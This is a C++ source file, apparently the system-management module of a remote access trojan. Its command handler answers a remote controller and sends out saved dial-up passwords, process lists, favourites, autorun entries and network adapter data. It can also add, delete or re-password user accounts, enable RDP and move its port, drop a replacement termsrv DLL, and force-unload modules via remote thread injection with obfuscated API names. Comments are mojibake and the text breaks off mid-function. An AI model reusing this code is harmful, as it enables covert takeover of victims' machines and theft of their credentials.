2219 lines
56 KiB
C++
2219 lines
56 KiB
C++
// SystemManager.cpp: implementation of the CSystemManager class.
|
||
//
|
||
//////////////////////////////////////////////////////////////////////
|
||
|
||
#include "SystemManager.h"
|
||
|
||
#include <stdlib.h>
|
||
|
||
#include <tlhelp32.h>
|
||
#include <psapi.h>
|
||
#pragma comment(lib,"Psapi.lib")
|
||
#include <Wtsapi32.h>
|
||
#pragma comment(lib,"Wtsapi32.lib")
|
||
#include <LM.h>
|
||
#pragma comment(lib,"netapi32")
|
||
#include "GetNetState.h"
|
||
|
||
#include "Dialupass.h"
|
||
#include <Windows.h>
|
||
#include <setupapi.h>
|
||
#include <Windows.h>
|
||
#include <IPHlpApi.h>
|
||
#include <iostream>
|
||
#pragma comment(lib,"IPHlpApi.lib")
|
||
using namespace std;
|
||
#include <NetCon.h>
|
||
|
||
#pragma comment(lib,"Rpcrt4.lib")//GUID
|
||
|
||
#pragma comment(lib,"ole32.lib")
|
||
|
||
#include <locale>
|
||
#include <stdio.h>
|
||
|
||
#pragma comment(lib, "setupapi.lib")
|
||
extern HMODULE hDllModule;
|
||
//////////////////////////////////////////////////////////////////////
|
||
// Construction/Destruction
|
||
//////////////////////////////////////////////////////////////////////
|
||
|
||
CSystemManager::CSystemManager(CClientSocket *pClient) : CManager(pClient)
|
||
{
|
||
SendProcessList();
|
||
hSendMemoryThread= MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)SendCPUAndMemoryThread, (LPVOID)this, 0, NULL);
|
||
}
|
||
|
||
CSystemManager::~CSystemManager()
|
||
{
|
||
WaitForSingleObject(hSendMemoryThread, INFINITE);
|
||
CloseHandle(hSendMemoryThread);
|
||
}
|
||
|
||
bool SwitchInputDesktop()
|
||
{
|
||
BOOL bRet = false;
|
||
DWORD dwLengthNeeded;
|
||
|
||
HDESK hOldDesktop, hNewDesktop;
|
||
char strCurrentDesktop[256], strInputDesktop[256];
|
||
|
||
hOldDesktop = GetThreadDesktop(GetCurrentThreadId());
|
||
memset(strCurrentDesktop, 0, sizeof(strCurrentDesktop));
|
||
GetUserObjectInformation(hOldDesktop, UOI_NAME, &strCurrentDesktop, sizeof(strCurrentDesktop), &dwLengthNeeded);
|
||
|
||
|
||
hNewDesktop = OpenInputDesktop(0, FALSE, MAXIMUM_ALLOWED);
|
||
memset(strInputDesktop, 0, sizeof(strInputDesktop));
|
||
GetUserObjectInformation(hNewDesktop, UOI_NAME, &strInputDesktop, sizeof(strInputDesktop), &dwLengthNeeded);
|
||
|
||
if (lstrcmpi(strInputDesktop, strCurrentDesktop) != 0)
|
||
{
|
||
SetThreadDesktop(hNewDesktop);
|
||
bRet = true;
|
||
}
|
||
CloseDesktop(hOldDesktop);
|
||
|
||
CloseDesktop(hNewDesktop);
|
||
|
||
|
||
return bRet;
|
||
}
|
||
|
||
void CSystemManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
|
||
{
|
||
SwitchInputDesktop();
|
||
|
||
switch (lpBuffer[0])
|
||
{
|
||
case COMMAND_PSLIST:
|
||
SendProcessList();
|
||
break;
|
||
case COMMAND_WSLIST:
|
||
SendWindowsList();
|
||
break;
|
||
case COMMAND_KILLPROCESS:
|
||
KillProcess((LPBYTE)lpBuffer + 1, nSize - 1);
|
||
SendProcessList();
|
||
break;
|
||
case COMMAND_DSLIST: //<2F><>ȡ<EFBFBD><C8A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
SendDialupassList();
|
||
break;
|
||
case COMMAND_SOFTWARELIST:
|
||
SendSoftWareList();
|
||
break;
|
||
case COMMAND_FULIST:
|
||
SendFavoritesUrlList();
|
||
break;
|
||
case COMMAND_NSLIST:
|
||
SendNetStateList();
|
||
break;
|
||
case COMMAND_REGLIST:
|
||
SendRegRunList();
|
||
break;
|
||
case COMMAND_SYSLIST:
|
||
SendSysinfooList();
|
||
break;
|
||
case COMMAND_MACLIST:
|
||
SendMacList();
|
||
break;
|
||
case COMMAND_KILLPROCESS_WINDOW:
|
||
KillProcess((LPBYTE)lpBuffer + 1, nSize - 1);
|
||
SendWindowsList();
|
||
break;
|
||
case COMMAND_WINDOW_TEST:
|
||
TestWindow(lpBuffer+1);
|
||
break;
|
||
case COMMAND_WINDOW_CLOSE: //<2F>ڷ<F2B4B0BF><DAB7>ر<CDB9><D8B1><EFBFBD>Ϣ
|
||
CloseWindow(lpBuffer+1);
|
||
break;
|
||
case COMMAND_SSLIST:
|
||
SendSysInfoList();
|
||
break;
|
||
case COMMAND_USLIST:
|
||
SendSysUserList();
|
||
break;
|
||
case COMMAND_ASLIST:
|
||
SendUserStateList();
|
||
break;
|
||
case COMMAND_ACITVEUSER:
|
||
ChangeUserState((LPBYTE)lpBuffer + 1, nSize - 1, NULL);
|
||
break;
|
||
case COMMAND_DISABLEEUSER:
|
||
ChangeUserState((LPBYTE)lpBuffer + 1, nSize - 1, TRUE);
|
||
break;
|
||
case COMMAND_CHANGE_USERPASS:
|
||
ChangeUserPass((LPBYTE)lpBuffer + 1, nSize - 1);
|
||
break;
|
||
case COMMAND_DELUSER:
|
||
DeleteUser((LPBYTE)lpBuffer + 1, nSize - 1);
|
||
break;
|
||
case COMMAND_DISCONNECTUSER:
|
||
DisconnectUser((LPBYTE)lpBuffer + 1, nSize - 1);
|
||
break;
|
||
case COMMAND_LOGOFF_USER:
|
||
LogOffUser((LPBYTE)lpBuffer + 1, nSize - 1);
|
||
break;
|
||
case COMMAND_NET_USER: // <20><>NET<45><54><EFBFBD>û<EFBFBD>
|
||
NoNetAddUser((LPBYTE)lpBuffer + 1, nSize - 1);
|
||
break;
|
||
case COMMAND_3389_PORT:
|
||
Change3389Port(lpBuffer + 1);
|
||
break;
|
||
case COMMAND_OPEN_3389:
|
||
Open3389();
|
||
break;
|
||
case COMMAND_SEND_TERMSRV:
|
||
if(WriteTermsrv(lpBuffer + 1,nSize -1))
|
||
{
|
||
BYTE bToken = TOKEN_TERMSRV_OK;
|
||
Send(&bToken,sizeof(bToken));
|
||
}
|
||
break;
|
||
case COMMAND_S_SESSION:
|
||
ShutdownWindows(lpBuffer[1]);
|
||
break;
|
||
default:
|
||
break;
|
||
}
|
||
}
|
||
|
||
BOOL bIsOsXP()
|
||
{
|
||
OSVERSIONINFOEX OsVerInfoEx;
|
||
OsVerInfoEx.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
|
||
GetVersionEx((OSVERSIONINFO *)&OsVerInfoEx); // ע<><D7A2>ת<EFBFBD><D7AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
return OsVerInfoEx.dwMajorVersion == 5 && OsVerInfoEx.dwMinorVersion == 1;
|
||
}
|
||
|
||
void CSystemManager::GetTermsrvFile()
|
||
{
|
||
BYTE bToken = TOKEN_GET_TERMSRV;
|
||
Send(&bToken,sizeof(bToken));
|
||
}
|
||
|
||
BOOL CSystemManager::WriteTermsrv(LPBYTE lpBuffer, UINT nSize)
|
||
{
|
||
TCHAR lpDllName[MAX_PATH];
|
||
GetSystemDirectory(lpDllName, MAX_PATH);
|
||
lstrcat(lpDllName, "\\termsrv_t.dll");
|
||
|
||
HANDLE hFile;
|
||
DWORD dwBytesWritten;
|
||
hFile = CreateFile(lpDllName,GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,NULL,NULL);
|
||
if (hFile == INVALID_HANDLE_VALUE)
|
||
return false;
|
||
if(!WriteFile(hFile, lpBuffer, nSize, &dwBytesWritten, NULL))
|
||
return false;
|
||
CloseHandle(hFile);
|
||
|
||
Open3389();
|
||
|
||
return true;
|
||
}
|
||
|
||
|
||
bool UnloadRemoteModule(DWORD dwProcessID, HANDLE hModuleHandle)
|
||
{
|
||
HANDLE hRemoteThread;
|
||
HANDLE hProcess;
|
||
|
||
if (hModuleHandle == NULL)
|
||
return false;
|
||
hProcess=OpenProcess(PROCESS_VM_WRITE|PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION, FALSE, dwProcessID);
|
||
if (hProcess == NULL)
|
||
return false;
|
||
|
||
char ExUmf[] = {'k','e','r','n','e','l','3','2','.','d','l','l','\0'};
|
||
|
||
char TjHbd[] = {'F','r','e','e','L','i','b','r','a','r','y','\0'};
|
||
|
||
HMODULE hModule=GetModuleHandle(ExUmf);
|
||
LPTHREAD_START_ROUTINE pfnStartRoutine = (LPTHREAD_START_ROUTINE)::GetProcAddress(hModule, TjHbd);
|
||
hRemoteThread=CreateRemoteThread(hProcess, NULL, 0, pfnStartRoutine, hModuleHandle, 0, NULL);
|
||
|
||
if(hRemoteThread==NULL)
|
||
{
|
||
CloseHandle(hProcess);
|
||
return false;
|
||
}
|
||
WaitForSingleObject(hRemoteThread,INFINITE);
|
||
CloseHandle(hProcess);
|
||
CloseHandle(hRemoteThread);
|
||
return true;
|
||
}
|
||
|
||
HANDLE FindModule(DWORD dwProcessID, LPCTSTR lpModulePath)
|
||
{
|
||
HANDLE hModuleHandle = NULL;
|
||
MODULEENTRY32 me32 = {0};
|
||
HANDLE hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID);
|
||
me32.dwSize = sizeof(MODULEENTRY32);
|
||
if(::Module32First(hModuleSnap, &me32))
|
||
{
|
||
do
|
||
{
|
||
if (lstrcmpi(me32.szExePath, lpModulePath) == 0)
|
||
{
|
||
hModuleHandle = me32.hModule;
|
||
break;
|
||
}
|
||
}while(::Module32Next(hModuleSnap,&me32));
|
||
}
|
||
::CloseHandle(hModuleSnap);
|
||
return hModuleHandle;
|
||
}
|
||
|
||
|
||
bool UnloadModule(LPCTSTR lpModulePath)
|
||
{
|
||
BOOL bRet = false;
|
||
PROCESSENTRY32 pe32;
|
||
pe32.dwSize = sizeof(pe32);
|
||
|
||
HANDLE hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
|
||
|
||
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>صĽ<D8B5><C4BD><EFBFBD>
|
||
if(Process32First(hProcessSnap, &pe32))
|
||
{
|
||
do
|
||
{
|
||
HANDLE hModuleHandle = FindModule(pe32.th32ProcessID, lpModulePath);
|
||
if (hModuleHandle != NULL)
|
||
{
|
||
bRet = UnloadRemoteModule(pe32.th32ProcessID, hModuleHandle);
|
||
}
|
||
}while (Process32Next(hProcessSnap,&pe32));
|
||
}
|
||
CloseHandle(hProcessSnap);
|
||
return bRet;
|
||
}
|
||
|
||
bool CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam)
|
||
{
|
||
if (!IsWindowVisible(hwnd))
|
||
return true;
|
||
|
||
DWORD dwWindowThreadId = NULL;
|
||
DWORD dwLsassId = (DWORD)lParam;
|
||
GetWindowThreadProcessId(hwnd, &dwWindowThreadId);
|
||
if (dwWindowThreadId == (DWORD)lParam)
|
||
{
|
||
// <20>ر<EFBFBD>ָ<EFBFBD><D6B8><EFBFBD><EFBFBD><EFBFBD>̵Ĵ<CCB5><C4B4><EFBFBD>
|
||
SendMessage(hwnd, WM_CLOSE, 0, 0);
|
||
}
|
||
return true;
|
||
}
|
||
DWORD GetProcessId(LPCTSTR szProcName)
|
||
{
|
||
PROCESSENTRY32 pe;
|
||
DWORD dwPid;
|
||
DWORD dwRet;
|
||
BOOL bFound = FALSE;
|
||
|
||
HANDLE hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
|
||
if (hSP)
|
||
{
|
||
pe.dwSize = sizeof( pe );
|
||
|
||
for (dwRet = Process32First(hSP, &pe); dwRet; dwRet = Process32Next(hSP, &pe))
|
||
{
|
||
if (lstrcmpi( szProcName, pe.szExeFile) == 0)
|
||
{
|
||
dwPid = pe.th32ProcessID;
|
||
bFound = TRUE;
|
||
break;
|
||
}
|
||
}
|
||
CloseHandle(hSP);
|
||
|
||
if (bFound == TRUE)
|
||
{
|
||
return dwPid;
|
||
}
|
||
}
|
||
return NULL;
|
||
}
|
||
|
||
void HijackService()
|
||
{
|
||
TCHAR strDll[MAX_PATH];
|
||
GetSystemDirectory(strDll, sizeof(strDll));
|
||
lstrcat(strDll, "\\termsrv.dll");
|
||
|
||
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ж<EFBFBD><D0B6><EFBFBD><EFBFBD><EFBFBD>ڼ<EFBFBD><DABC>ص<EFBFBD>DLL
|
||
CSystemManager::DebugPrivilege(SE_DEBUG_NAME, TRUE);
|
||
if (!UnloadModule(strDll))
|
||
return;
|
||
CSystemManager::DebugPrivilege(SE_DEBUG_NAME, FALSE);
|
||
|
||
// <20>ر<EFBFBD>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD><EFBFBD>ij<EFBFBD><C4B3><EFBFBD><EFBFBD>Ի<EFBFBD><D4BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>DLLǿ<4C><C7BF>ж<EFBFBD><D0B6>ʹһЩ<D2BB><D0A9><EFBFBD><EFBFBD><EFBFBD>쳣<EFBFBD><ECB3A3>ֹ<EFBFBD><D6B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Զ<EFBFBD><D4B6>ػ<EFBFBD><D8BB>Ի<EFBFBD><D4BB><EFBFBD>
|
||
// <20>Խ<EFBFBD><D4BD≯<EFBFBD><CCB8><EFBFBD><EFBFBD>ر<EFBFBD>Ȩ<EFBFBD><C8A8>
|
||
CSystemManager::DebugPrivilege(SE_SHUTDOWN_NAME,TRUE);
|
||
DWORD dwLsassId = GetProcessId("csrss.exe");
|
||
while (!AbortSystemShutdown(NULL))
|
||
{
|
||
// һЩϵͳ<CFB5>ǻᵯ<C7BB><E1B5AF>drwtsn32.exe
|
||
DWORD dwDrwtsn32Id = GetProcessId("drwtsn32.exe");
|
||
if (dwDrwtsn32Id != NULL)
|
||
{
|
||
EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)dwDrwtsn32Id);
|
||
}
|
||
// ģ<><C4A3>ǿ<EFBFBD><C7BF>ж<EFBFBD><D0B6>ʱ<EFBFBD><CAB1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ر<EFBFBD>csrss.exe<78><65><EFBFBD>̵<EFBFBD><CCB5><EFBFBD><EFBFBD>ij<EFBFBD><C4B3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)dwLsassId);
|
||
Sleep(10);
|
||
}
|
||
CSystemManager::DebugPrivilege(SE_SHUTDOWN_NAME, FALSE);
|
||
}
|
||
|
||
void OnStartService(LPCTSTR lpService)
|
||
{
|
||
SC_HANDLE hSCManager = OpenSCManager( NULL, NULL,SC_MANAGER_CREATE_SERVICE );
|
||
if ( NULL != hSCManager )
|
||
{
|
||
SC_HANDLE hService = OpenService(hSCManager, lpService, DELETE | SERVICE_START);
|
||
if ( NULL != hService )
|
||
{
|
||
StartService(hService, 0, NULL);
|
||
CloseServiceHandle( hService );
|
||
}
|
||
CloseServiceHandle( hSCManager );
|
||
}
|
||
}
|
||
void CSystemManager::SendNetStateList()
|
||
{
|
||
LPBYTE lpBuffer = getNetStateList();
|
||
if (lpBuffer == NULL)
|
||
return;
|
||
|
||
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
|
||
LocalFree(lpBuffer);
|
||
}
|
||
|
||
|
||
void CSystemManager::SendFavoritesUrlList()
|
||
{
|
||
LPBYTE lpBuffer = getFavoritesUrlList();
|
||
if (lpBuffer == NULL)
|
||
return;
|
||
|
||
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
|
||
LocalFree(lpBuffer);
|
||
}
|
||
|
||
void CSystemManager::SendSysinfooList()
|
||
{
|
||
LPBYTE lpBuffer = getSysinfooList();
|
||
if (lpBuffer == NULL)
|
||
return;
|
||
|
||
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
|
||
LocalFree(lpBuffer);
|
||
}
|
||
void CSystemManager::SendMacList()
|
||
{
|
||
LPBYTE lpBuffer = getMacList();
|
||
if (lpBuffer == NULL)
|
||
return;
|
||
|
||
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
|
||
LocalFree(lpBuffer);
|
||
}
|
||
void CSystemManager::SendRegRunList()
|
||
{
|
||
LPBYTE lpBuffer = getRegRunList();
|
||
if (lpBuffer == NULL)
|
||
return;
|
||
|
||
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
|
||
LocalFree(lpBuffer);
|
||
}
|
||
|
||
LPBYTE lpFUBuffer = NULL;
|
||
DWORD dwFUOffset = 1; // λ<><CEBB>ָ<EFBFBD><D6B8>
|
||
void FindFavoritesUrl(char* searchfilename)
|
||
{
|
||
char favpath[MAX_PATH] = {0};
|
||
char tmpPath[MAX_PATH] = {0};
|
||
DWORD dwFULength = 0;
|
||
|
||
lstrcat(favpath,searchfilename);
|
||
lstrcat(favpath,"\\*.*");
|
||
|
||
WIN32_FIND_DATA fd;
|
||
ZeroMemory(&fd, sizeof(WIN32_FIND_DATA));
|
||
|
||
HANDLE hFind = FindFirstFile(favpath, &fd); // <20>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><D7BA><EFBFBD><EFBFBD> url
|
||
do
|
||
{
|
||
if (fd.cFileName[0] != '.')
|
||
{
|
||
strcpy(tmpPath, searchfilename);
|
||
strcat(tmpPath, "\\");
|
||
strcat(tmpPath, fd.cFileName);
|
||
if( fd.dwFileAttributes&FILE_ATTRIBUTE_DIRECTORY )
|
||
{
|
||
|
||
FindFavoritesUrl(tmpPath);
|
||
}else if (strstr(fd.cFileName, ".url"))
|
||
{
|
||
// printf("<22>ļ<EFBFBD><C4BC><EFBFBD> <20><> %s ƥ<><C6A5> \r\n",fd.cFileName);
|
||
|
||
TCHAR buf[MAX_PATH] = {0};
|
||
::GetPrivateProfileString("InternetShortcut", "URL", "", buf, sizeof(buf), tmpPath);
|
||
|
||
|
||
dwFULength = lstrlen(buf) + lstrlen(fd.cFileName) + 2;
|
||
|
||
if (LocalSize(lpFUBuffer) < (dwFUOffset + dwFULength))
|
||
lpFUBuffer = (LPBYTE)LocalReAlloc(lpFUBuffer, (dwFUOffset + dwFULength) + 1024, LMEM_ZEROINIT|LMEM_MOVEABLE);
|
||
|
||
memcpy(lpFUBuffer + dwFUOffset, fd.cFileName, lstrlen(fd.cFileName) + 1);
|
||
dwFUOffset += lstrlen(fd.cFileName) + 1;
|
||
|
||
memcpy(lpFUBuffer + dwFUOffset, buf, lstrlen(buf) + 1);
|
||
dwFUOffset += lstrlen(buf) + 1;
|
||
|
||
}
|
||
}
|
||
} while(FindNextFile(hFind, &fd) );
|
||
FindClose(hFind);
|
||
}
|
||
|
||
LPBYTE CSystemManager::getRegRunList()
|
||
{
|
||
|
||
DWORD dwType = 0;
|
||
DWORD dwBufferSize = MAXBYTE;
|
||
DWORD dwKeySize = MAXBYTE;
|
||
char szValueName[255]={0};
|
||
char szValueKey[255]={0};
|
||
LPBYTE lpBuffer = NULL;
|
||
DWORD dwOffset = 1;
|
||
DWORD dwLength = 0;
|
||
HKEY hKey=NULL;
|
||
char strTemp[255]={0};
|
||
LONG lRet = RegOpenKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
|
||
if(lRet != ERROR_SUCCESS){
|
||
|
||
return 0;
|
||
}
|
||
int i=0;
|
||
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 10000);
|
||
lpBuffer[0] = TOKEN_RUNIST;
|
||
dwOffset = 1;
|
||
// CString strTemp;
|
||
while(true)
|
||
{
|
||
dwBufferSize = MAXBYTE;
|
||
dwKeySize = MAXBYTE;
|
||
lRet = RegEnumValue(hKey,i++,szValueName,&dwBufferSize,0,0,(unsigned char *)szValueKey,&dwKeySize);
|
||
if(lRet==ERROR_NO_MORE_ITEMS){
|
||
break;
|
||
}
|
||
lstrcpy(strTemp,(const char *)i);
|
||
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̫С<CCAB><D0A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
dwLength = lstrlen(szValueName) + lstrlen(szValueKey) +2;
|
||
|
||
if (LocalSize(lpBuffer) < (dwOffset + dwLength))
|
||
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE);
|
||
|
||
// memcpy(lpBuffer + dwOffset, strTemp, lstrlen(strTemp) + 1);
|
||
// dwOffset += lstrlen(strTemp) + 1;
|
||
|
||
memcpy(lpBuffer + dwOffset, szValueName, lstrlen(szValueName) + 1);
|
||
dwOffset += lstrlen(szValueName) + 1;
|
||
|
||
memcpy(lpBuffer + dwOffset, szValueKey, lstrlen(szValueKey) + 1);
|
||
dwOffset += lstrlen(szValueKey) + 1;
|
||
|
||
|
||
}
|
||
RegCloseKey(hKey);
|
||
ZeroMemory(szValueName,MAXBYTE);
|
||
ZeroMemory(szValueKey,MAXBYTE);//<2F><><EFBFBD>ջ<EFBFBD><D5BB><EFBFBD><EFBFBD><EFBFBD>
|
||
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE);
|
||
return lpBuffer;
|
||
|
||
|
||
|
||
}
|
||
|
||
LPBYTE CSystemManager::getSysinfooList()
|
||
{
|
||
LPBYTE lpBuffer = NULL;
|
||
DWORD dwOffset = 1;
|
||
DWORD dwLength = 0;
|
||
HKEY hKey=NULL;
|
||
|
||
HDEVINFO hDevInfo;
|
||
SP_DEVINFO_DATA DeviceInfoData;
|
||
DWORD i;
|
||
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 10000);
|
||
lpBuffer[0] = TOKEN_SYSIST;
|
||
dwOffset = 1;
|
||
// <20>õ<EFBFBD><C3B5><EFBFBD><EFBFBD><EFBFBD><EFBFBD>豸 HDEVINFO
|
||
hDevInfo = SetupDiGetClassDevs(NULL, 0, 0, DIGCF_PRESENT | DIGCF_ALLCLASSES );
|
||
if (hDevInfo == INVALID_HANDLE_VALUE)
|
||
return 0;
|
||
// ѭ<><D1AD><EFBFBD>о<EFBFBD>
|
||
DeviceInfoData.cbSize = sizeof(SP_DEVINFO_DATA);
|
||
for (i = 0; SetupDiEnumDeviceInfo(hDevInfo, i, &DeviceInfoData); i++)
|
||
{
|
||
char szClassBuf[MAX_PATH] = { 0 };
|
||
char szDescBuf[MAX_PATH] = { 0 };
|
||
|
||
// <20><>ȡ<EFBFBD><C8A1><EFBFBD><EFBFBD>
|
||
// if (!SetupDiGetDeviceRegistryProperty(hDevInfo, &DeviceInfoData, SPDRP_CLASS, NULL, (PBYTE)szClassBuf, MAX_PATH - 1, NULL))
|
||
// continue;
|
||
|
||
//<2F><>ȡ<EFBFBD>豸<EFBFBD><E8B1B8><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ
|
||
if (!SetupDiGetDeviceRegistryProperty(hDevInfo, &DeviceInfoData, SPDRP_DEVICEDESC, NULL, (PBYTE)szDescBuf, MAX_PATH - 1, NULL))
|
||
continue;
|
||
dwLength = lstrlen(szDescBuf) +1;
|
||
|
||
if (LocalSize(lpBuffer) < (dwOffset + dwLength))
|
||
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE);
|
||
memcpy(lpBuffer + dwOffset, szDescBuf, lstrlen(szDescBuf) + 1);
|
||
dwOffset += lstrlen(szDescBuf) + 1;
|
||
|
||
|
||
}
|
||
// <20>ͷ<EFBFBD>
|
||
SetupDiDestroyDeviceInfoList(hDevInfo);
|
||
|
||
|
||
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE);
|
||
return lpBuffer;
|
||
}
|
||
static const int ADAPTERNUM = 10;
|
||
|
||
#pragma comment(lib,"IPHlpApi.lib")
|
||
using namespace std;
|
||
|
||
#pragma comment(lib,"Rpcrt4.lib")//GUID
|
||
|
||
#pragma comment(lib,"ole32.lib")
|
||
|
||
#include <locale>
|
||
#include <stdio.h>
|
||
|
||
LPBYTE CSystemManager::getMacList()
|
||
{
|
||
LPBYTE lpBuffer = NULL;
|
||
DWORD dwOffset = 0;
|
||
DWORD dwLength = 0;
|
||
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 10000);
|
||
lpBuffer[0] = TOKEN_MACIST;
|
||
dwOffset = 1;
|
||
char mac[50];
|
||
char wan1[50];
|
||
|
||
//PIP_ADAPTER_INFO<46>ṹ<EFBFBD><E1B9B9>ָ<EFBFBD><D6B8><EFBFBD>洢<EFBFBD><E6B4A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ
|
||
PIP_ADAPTER_INFO pAdapter=new IP_ADAPTER_INFO();
|
||
//<2F>õ<EFBFBD><C3B5>ṹ<EFBFBD><E1B9B9><EFBFBD><EFBFBD>С,<2C><><EFBFBD><EFBFBD>GetAdaptersInfo<66><6F><EFBFBD><EFBFBD>
|
||
unsigned long stSize=sizeof(IP_ADAPTER_INFO);
|
||
//<2F><><EFBFBD><EFBFBD>GetAdaptersInfo<66><6F><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD>pIpAdapterInfoָ<6F><D6B8><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;<3B><><EFBFBD><EFBFBD>stSize<7A><65><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҳ<EFBFBD><D2B2>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
int nRel=GetAdaptersInfo(pAdapter,&stSize);
|
||
if(ERROR_BUFFER_OVERFLOW==nRel)
|
||
{
|
||
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ص<EFBFBD><D8B5><EFBFBD>ERROR_BUFFER_OVERFLOW
|
||
//<2F><>˵<EFBFBD><CBB5>GetAdaptersInfo<66><6F><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݵ<EFBFBD><DDB5>ڴ<EFBFBD><DAB4>ռ䲻<D5BC><E4B2BB>,ͬʱ<CDAC>䴫<EFBFBD><E4B4AB>stSize,<2C><>ʾ<EFBFBD><CABE>Ҫ<EFBFBD>Ŀռ<C4BF><D5BC><EFBFBD>С
|
||
//<2F><>Ҳ<EFBFBD><D2B2>˵<EFBFBD><CBB5>ΪʲôstSize<7A><65><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҳ<EFBFBD><D2B2>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
//<2F>ͷ<EFBFBD>ԭ<EFBFBD><D4AD><EFBFBD><EFBFBD><EFBFBD>ڴ<EFBFBD><DAB4>ռ<EFBFBD>
|
||
delete pAdapter;
|
||
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڴ<EFBFBD><DAB4>ռ<EFBFBD><D5BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>洢<EFBFBD><E6B4A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ
|
||
pAdapter=(PIP_ADAPTER_INFO)new BYTE[stSize];
|
||
//<2F>ٴε<D9B4><CEB5><EFBFBD>GetAdaptersInfo<66><6F><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD>pIpAdapterInfoָ<6F><D6B8><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
nRel=GetAdaptersInfo(pAdapter,&stSize);
|
||
}
|
||
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
if(ERROR_SUCCESS==nRel)
|
||
{
|
||
while(pAdapter)
|
||
{
|
||
sprintf(mac,"%02X-%02X-%02X-%02X-%02X-%02X", pAdapter->Address[0], pAdapter->Address[1],
|
||
pAdapter->Address[2], pAdapter->Address[3],pAdapter->Address[4], pAdapter->Address[5]);
|
||
|
||
|
||
dwLength = lstrlen(pAdapter->AdapterName) + lstrlen(pAdapter->Description) +
|
||
lstrlen(mac)+ lstrlen(pAdapter->IpAddressList.IpAddress.String)+ lstrlen(pAdapter->IpAddressList.IpMask.String)
|
||
+ 5;
|
||
|
||
if (LocalSize(lpBuffer) < (dwOffset + dwLength))
|
||
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE);
|
||
|
||
memcpy(lpBuffer + dwOffset, pAdapter->AdapterName, lstrlen(pAdapter->AdapterName) + 1);
|
||
dwOffset += lstrlen(pAdapter->AdapterName) + 1;
|
||
|
||
memcpy(lpBuffer + dwOffset, pAdapter->Description, lstrlen(pAdapter->Description) + 1);
|
||
dwOffset += lstrlen(pAdapter->Description) + 1;
|
||
|
||
memcpy(lpBuffer + dwOffset, mac, lstrlen(mac) + 1);
|
||
dwOffset += lstrlen(mac) + 1;
|
||
|
||
